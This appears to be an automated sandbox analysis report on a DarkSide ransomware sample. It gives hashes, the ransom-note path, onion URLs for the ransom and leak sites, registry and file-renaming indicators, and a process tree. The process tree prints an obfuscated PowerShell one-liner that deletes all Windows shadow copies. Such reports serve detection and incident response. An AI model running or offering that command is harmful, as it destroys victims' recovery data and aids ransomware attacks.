Overview
overview
10Static
static
81667e16357...43.exe
windows7_x64
31667e16357...43.exe
windows10_x64
317139a10fd...61.exe
windows7_x64
1017139a10fd...61.exe
windows10_x64
101cc7c198a8...cb.exe
windows7_x64
101cc7c198a8...cb.exe
windows10_x64
10243dff06fc...60.exe
windows7_x64
10243dff06fc...60.exe
windows10_x64
1027214dcb04...8f.exe
windows7_x64
1027214dcb04...8f.exe
windows10_x64
103dabd40d56...a6.exe
windows7_x64
33dabd40d56...a6.exe
windows10_x64
343e61519be...aa.exe
windows7_x64
1043e61519be...aa.exe
windows10_x64
1048a848bc9e...3a.exe
windows7_x64
1048a848bc9e...3a.exe
windows10_x64
10508dd6f7ed...dd.exe
windows7_x64
10508dd6f7ed...dd.exe
windows10_x64
10516664139b...4b.exe
windows7_x64
10516664139b...4b.exe
windows10_x64
10533672da9d...8d.exe
windows7_x64
10533672da9d...8d.exe
windows10_x64
106228f75f52...ff.exe
windows7_x64
106228f75f52...ff.exe
windows10_x64
106836ec8588...d8.exe
windows7_x64
36836ec8588...d8.exe
windows10_x64
368872cc22f...e7.exe
windows7_x64
1068872cc22f...e7.exe
windows10_x64
10691515a485...a5.exe
windows7_x64
10691515a485...a5.exe
windows10_x64
1078782fd324...34.exe
windows7_x64
1078782fd324...34.exe
windows10_x64
10Analysis
-
max time kernel
111s -
max time network
113s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
12-05-2021 19:34
Static task
static1
Behavioral task
behavioral1
Sample
1667e1635736f2b2ba9727457f995a67201ddcd818496c9296713ffa18e17a43.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
1667e1635736f2b2ba9727457f995a67201ddcd818496c9296713ffa18e17a43.exe
Resource
win10v20210410
Behavioral task
behavioral3
Sample
17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
Resource
win7v20210410
Behavioral task
behavioral4
Sample
17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
Resource
win10v20210410
Behavioral task
behavioral5
Sample
1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe
Resource
win7v20210410
Behavioral task
behavioral6
Sample
1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe
Resource
win10v20210410
Behavioral task
behavioral7
Sample
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.exe
Resource
win7v20210410
Behavioral task
behavioral8
Sample
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.exe
Resource
win10v20210410
Behavioral task
behavioral9
Sample
27214dcb04310040c38f8d6a65fe03c14b18d4171390da271855fdd02e06768f.exe
Resource
win7v20210410
Behavioral task
behavioral10
Sample
27214dcb04310040c38f8d6a65fe03c14b18d4171390da271855fdd02e06768f.exe
Resource
win10v20210410
Behavioral task
behavioral11
Sample
3dabd40d564cf8a8163432abc38768b0a7d45f0fc1970d802dc33b9109feb6a6.exe
Resource
win7v20210410
Behavioral task
behavioral12
Sample
3dabd40d564cf8a8163432abc38768b0a7d45f0fc1970d802dc33b9109feb6a6.exe
Resource
win10v20210410
Behavioral task
behavioral13
Sample
43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe
Resource
win7v20210410
Behavioral task
behavioral14
Sample
43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe
Resource
win10v20210410
Behavioral task
behavioral15
Sample
48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe
Resource
win7v20210410
Behavioral task
behavioral16
Sample
48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe
Resource
win10v20210410
Behavioral task
behavioral17
Sample
508dd6f7ed6c143cf5e1ed6a4051dd8ee7b5bf4b7f55e0704d21ba785f2d5add.exe
Resource
win7v20210410
Behavioral task
behavioral18
Sample
508dd6f7ed6c143cf5e1ed6a4051dd8ee7b5bf4b7f55e0704d21ba785f2d5add.exe
Resource
win10v20210410
Behavioral task
behavioral19
Sample
516664139b0ddd044397a56482d7308d87c213c320a3151ccb9738e8f932654b.exe
Resource
win7v20210410
Behavioral task
behavioral20
Sample
516664139b0ddd044397a56482d7308d87c213c320a3151ccb9738e8f932654b.exe
Resource
win10v20210410
Behavioral task
behavioral21
Sample
533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
Resource
win7v20210410
Behavioral task
behavioral22
Sample
533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
Resource
win10v20210410
Behavioral task
behavioral23
Sample
6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
Resource
win7v20210410
Behavioral task
behavioral24
Sample
6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
Resource
win10v20210410
Behavioral task
behavioral25
Sample
6836ec8588b8049bcd57cd920b7a75f1e206e5e8bb316927784afadb634ea4d8.exe
Resource
win7v20210410
Behavioral task
behavioral26
Sample
6836ec8588b8049bcd57cd920b7a75f1e206e5e8bb316927784afadb634ea4d8.exe
Resource
win10v20210410
Behavioral task
behavioral27
Sample
68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe
Resource
win7v20210410
Behavioral task
behavioral28
Sample
68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe
Resource
win10v20210410
Behavioral task
behavioral29
Sample
691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
Resource
win7v20210410
Behavioral task
behavioral30
Sample
691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
Resource
win10v20210410
Behavioral task
behavioral31
Sample
78782fd324bc98a57274bd3fff8f756217c011484ebf6b614060115a699ee134.exe
Resource
win7v20210410
Behavioral task
behavioral32
Sample
78782fd324bc98a57274bd3fff8f756217c011484ebf6b614060115a699ee134.exe
Resource
win10v20210410
General
-
Target
68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe
-
Size
59KB
-
MD5
9e779da82d86bcd4cc43ab29f929f73f
-
SHA1
e6b47869caa776840ab79856b04096152103c71d
-
SHA256
68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7
-
SHA512
e0a172b862054b63c26e8852019cbd46b68c6102e4bae802ba851ae950798d336295795c0cc5d68002a0467c62e5800f1ecfdae05de2709d57bcc31375276bb7
Malware Config
Extracted
C:\\README.341d6443.TXT
darkside
http://darksidedxcftmqa.onion/blog/article/id/88/EbDyhFDs_z2hYxVR0XHv4S3ZzHUrKh4rqa3bgZ44Og-ORPgEAgMjzoTDuM46leXv
http://darksidfqzcuhtk2.onion/KB0LXKYKN6E96Z7RFYWCEI6NM03TX93VZCL5EDA4IVPXUIQQZBG2ZEG269ZIFSFM
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Modifies extensions of user files 14 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\CloseWatch.crw.341d6443 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe File opened for modification C:\Users\Admin\Pictures\ExportUnpublish.raw.341d6443 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe File opened for modification C:\Users\Admin\Pictures\WatchRename.raw.341d6443 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe File opened for modification C:\Users\Admin\Pictures\WriteRename.png.341d6443 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe File renamed C:\Users\Admin\Pictures\InstallComplete.png => C:\Users\Admin\Pictures\InstallComplete.png.341d6443 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe File opened for modification C:\Users\Admin\Pictures\InstallComplete.png.341d6443 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe File renamed C:\Users\Admin\Pictures\SaveOptimize.crw => C:\Users\Admin\Pictures\SaveOptimize.crw.341d6443 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe File renamed C:\Users\Admin\Pictures\WatchRename.raw => C:\Users\Admin\Pictures\WatchRename.raw.341d6443 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe File renamed C:\Users\Admin\Pictures\WriteRename.png => C:\Users\Admin\Pictures\WriteRename.png.341d6443 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe File renamed C:\Users\Admin\Pictures\CloseWatch.crw => C:\Users\Admin\Pictures\CloseWatch.crw.341d6443 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe File renamed C:\Users\Admin\Pictures\ConvertResolve.crw => C:\Users\Admin\Pictures\ConvertResolve.crw.341d6443 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe File renamed C:\Users\Admin\Pictures\ExportUnpublish.raw => C:\Users\Admin\Pictures\ExportUnpublish.raw.341d6443 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe File opened for modification C:\Users\Admin\Pictures\ConvertResolve.crw.341d6443 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe File opened for modification C:\Users\Admin\Pictures\SaveOptimize.crw.341d6443 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\341d6443.BMP" 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\341d6443.BMP" 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe -
Modifies Control Panel 1 IoCs
Processes:
68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallpaperStyle = "10" 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe -
Modifies registry class 5 IoCs
Processes:
68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\341d6443.ico" 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443\ = "341d6443" 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exe68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exepid process 912 powershell.exe 912 powershell.exe 1872 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe 1872 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exepowershell.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 1872 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe Token: SeSecurityPrivilege 1872 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe Token: SeTakeOwnershipPrivilege 1872 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe Token: SeLoadDriverPrivilege 1872 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe Token: SeSystemProfilePrivilege 1872 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe Token: SeSystemtimePrivilege 1872 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe Token: SeProfSingleProcessPrivilege 1872 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe Token: SeIncBasePriorityPrivilege 1872 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe Token: SeCreatePagefilePrivilege 1872 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe Token: SeBackupPrivilege 1872 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe Token: SeRestorePrivilege 1872 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe Token: SeShutdownPrivilege 1872 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe Token: SeDebugPrivilege 1872 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe Token: SeSystemEnvironmentPrivilege 1872 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe Token: SeRemoteShutdownPrivilege 1872 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe Token: SeUndockPrivilege 1872 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe Token: SeManageVolumePrivilege 1872 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe Token: 33 1872 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe Token: 34 1872 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe Token: 35 1872 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe Token: SeDebugPrivilege 912 powershell.exe Token: SeBackupPrivilege 644 vssvc.exe Token: SeRestorePrivilege 644 vssvc.exe Token: SeAuditPrivilege 644 vssvc.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exedescription pid process target process PID 1872 wrote to memory of 912 1872 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe powershell.exe PID 1872 wrote to memory of 912 1872 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe powershell.exe PID 1872 wrote to memory of 912 1872 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe powershell.exe PID 1872 wrote to memory of 912 1872 68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe"C:\Users\Admin\AppData\Local\Temp\68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe"1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:912
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:644
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD56f342e9161e85caac1a2a3d2526a9110
SHA11be2bd7269c56802c80d82849eff1dde2e987ee8
SHA2567b44a501572f537ac640273808696bdbb6745029e45c00443cdc7fb7e0256745
SHA512d62bd45bc980c1162147e6895502e7c4f65f8ce0e4f39962016e8bad7fb0e3037cb1cd7c1ed54e6252af6c022fbc9c1d51d07d16a5470e263a9cb28e2e0d5bed
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD58e8ae682256cfa4045f41c50be73bce3
SHA1114fe5bf02bb429ff3df60e311b29dee1e646c75
SHA256fe8a510581dfb16ccd52432f59b80b8fa67f38a11cc7b4df60c5dd6e5e751c95
SHA51241ee064d2c250e6bdc48174397e2938dab777c7797b3ba4c2d74298f1a52d642236a2ac8c7f45dbf9705a47a3b84fa9e4abd1758e9afedb4517a26d6e7dc6690